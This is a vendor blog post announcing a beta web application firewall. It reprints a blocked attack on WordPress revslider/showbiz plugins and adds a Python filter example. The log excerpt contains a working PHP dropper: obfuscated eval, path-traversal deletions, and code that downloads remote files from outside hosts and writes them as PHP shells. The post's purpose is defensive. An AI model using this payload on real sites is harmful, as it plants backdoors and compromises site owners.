The story of BitNinja WAF from backstage

Boglarka Angalet

BitNinja has two very efficient detection modules. Log analysis and DoS detection do a great job of filtering attacks, but they lack one very important thing: log analysis can only work on requests that have already reached your server. For attacks like login brute force this is not a problem, as there is a very low chance that the right user/pass combination will work within a few trials. Unfortunately, there are attacks where one well-targeted request is enough to hack a web application, inject infected code or alter files, and gain access.


Since we started BitNinja, we have been dreaming about a module capable of filtering traffic at the moment it reaches the server. We had plans for a web application firewall 8 months ago, but first we focused on the most common attacks. Now that BitNinja can easily intercept many different attacks, we can focus on more sophisticated ones. We are so excited to introduce you to the beta version of BitNinja WAF!

We started implementing our WAF at the end of June 2015. We wanted to create a highly scalable, fast and easy-to-extend local HTTP proxy. The first proof-of-concept implementation seemed viable in our test environment, with a couple of dozen requests per second. Then we tested the module on a slightly larger scale and found that it doesn't scale. The first implementation was a single-threaded solution: it failed to serve requests fast enough, ate all the CPU and crashed when we tried to increase the number of requests.

Back to the planning table

We redesigned the module as a multi-threaded version. Well, multi-threading is not one of the best features of PHP. :) We can say PHP is not suitable for classic multi-threaded applications. But we didn't want to drop PHP just because of one problem, so we decided to avoid classical multi-threading and implement a multi-process application instead. This is how BitNinja WAF was born in the form it exists today. BitNinja WAF forks multiple processes to filter the incoming requests, inspect them and block/greylist the malicious ones.

The worker processes communicate with the supervisor process through signals and shared memory, so it is blazing fast. It scales the number of filtering processes automatically based on the volume of incoming traffic, and cleans up unused processes automatically too. It has a very minimal CPU and memory footprint and is so fast that you won't experience any lag on page loads.

Since we started testing BitNinja WAF in our production environment, we have seen brilliant results that I want to share with you.

This is one of the attack attempts BitNinja WAF successfully intercepted just a few hours ago:

[info] +02:00 2015-10-13 10:30:36 - |WAF| Rejecting connection from IP [208.110.70.251]; WAF Filter got matching query: --xYzZY
Content-Disposition: form-data; name="action"

revslider_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="revslider.zip"
Content-Type: application/zip

@set_time_limit(0);
unlink("../../../../../../wp-content/plugins/revslider/temp/.htaccess");
unlink("../../../../../../wp-content/plugins/revslider/temp/update_extract/revslider.zip");
eval(gzinflate(str_rot13(base64_decode($dani))));
[info] +02:00 2015-10-13 10:30:39 - |WAF| Rejecting connection from IP [208.110.70.251]; WAF's RegexFilter got matching query: --xYzZY
Content-Disposition: form-data; name="action"

showbiz_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="showbiz.zip"
Content-Type: application/zip

@set_time_limit(0);
unlink("../../../../../../wp-content/plugins/showbiz/temp/.htaccess");
unlink("../../../../../../wp-content/plugins/showbiz/temp/update_extract/showbiz.zip");
eval(gzinflate(str_rot13(base64_decode($dani))));
$path = $_SERVER['DOCUMENT_ROOT'].'/'.'wp-index2.php';
$path2 = $_SERVER['DOCUMENT_ROOT'].'/'.'aulia.php';
$content = " ";
$cont2 = " ";
if(file_exists($path)) @unlink($path);
$txt = fopen($path,"a+");
fwrite($txt, $content);
fclose($txt);
if(file_exists($path2)) @unlink($path2);
$txt2 = fopen($path2,"a+");
fwrite($txt2, $cont2);
fclose($txt2);

$file = file_get_contents("http://debi-umzug.ch/tmp/os.txt") ;
$r=fopen("os.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../os.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/error.txt") ;
$r=fopen("error.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../error.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/index.up.txt") ;
$r=fopen("index.up.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../index.up.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/media-template.txt") ;
$r=fopen("media-output.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../wp-includes/media-output.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/class-http.txt") ;
$r=fopen("class-resource.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../wp-includes/class-resource.php", "w"); fwrite($r,$file); fclose($r);
?>
--xYzZY--

Wow, cool, isn't it? :) What would have happened without the WAF? We would have seen one log entry, something like this:

abc.com 348.351.331.327 - - [05/Oct/2015:19:39:05 +0200] "POST /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 404 62352 "-" "Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0"

Neither log analysis nor the best sysadmin can tell you from this line that the request is hacking the whole website, infecting 5 files of the CMS, planting 2 PHP shell backdoors and doing severe damage to your site.
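What a body-level filter has to look at that the access log line cannot show: an added example in Python (not BitNinja's code) that parses a constructed multipart body shaped like the logged request, opens the uploaded zip in memory and rejects a plugin update whose archive contains a PHP entry, matching extensions case-insensitively so a name like `.rev.phP.php` is caught. The boundary value comes from the log; the function names, the sample body and its inert archive entry are assumptions constructed for the example.

```python
import io, re, zipfile

BOUNDARY = b"xYzZY"  # the boundary string used by the logged request
PHP_EXT = re.compile(r"\.ph(p\d?|tml|ar)$", re.I)  # case-insensitive, so ".phP.php" is caught too


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Split a multipart/form-data body into (name, filename, content) tuples."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        content = content[:-2] if content.endswith(b"\r\n") else content  # CRLF before next boundary
        params = dict(re.findall(r'(name|filename)="([^"]*)"', head.decode("latin-1")))
        parts.append((params.get("name", ""), params.get("filename"), content))
    return parts


def inspect_upload(body: bytes, boundary: bytes = BOUNDARY) -> dict:
    """Flag a plugin-update upload whose archive carries PHP code."""
    fields, archive = {}, None
    for name, fname, content in parse_multipart(body, boundary):
        if fname is None:
            fields[name] = content.decode("latin-1")
        elif fname.lower().endswith(".zip"):
            archive = content
    finding = {"action": fields.get("action"), "php_entries": [], "reject": False}
    if archive is not None:
        try:
            with zipfile.ZipFile(io.BytesIO(archive)) as zf:
                finding["php_entries"] = [n for n in zf.namelist() if PHP_EXT.search(n)]
        except zipfile.BadZipFile:
            finding["php_entries"] = ["<unreadable archive>"]  # cannot be vetted, so treat as suspicious
    finding["reject"] = fields.get("client_action") == "update_plugin" and bool(finding["php_entries"])
    return finding


def build_sample(entry: str = "revslider/.rev.phP.php") -> bytes:
    """Constructed request body shaped like the logged one; the archive entry is an inert stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry, "/* inert stub content for testing, not the real dropper */")

    def part(name: bytes, value: bytes, extra: bytes = b"") -> bytes:
        return (b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="' + name + b'"'
                + extra + b"\r\n\r\n" + value + b"\r\n")

    return (part(b"action", b"revslider_ajax_action") + part(b"client_action", b"update_plugin")
            + part(b"update_file", buf.getvalue(), b'; filename="revslider.zip"\r\nContent-Type: application/zip')
            + b"--" + BOUNDARY + b"--\r\n")
```

`inspect_upload(build_sample())` returns a finding with `reject` set, while the same body carrying only a `style.css` entry passes.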

Since we started testing BitNinja WAF on production servers, it has intercepted dozens of such dangerous requests in the last 2 days. The WAF module is crucial in the fight against hackers, as this way you can stop hacks before they even reach your web server.

When will BitNinja WAF be available for you to test?

We plan to keep testing it this week and release a new version with the new WAF module next week. The WAF will be disabled by default at first, and you will be able to enable or disable it on the dashboard with one click to experiment with it on any server. We will let you know as soon as the new version is ready.

Have a nice hacker hunting!

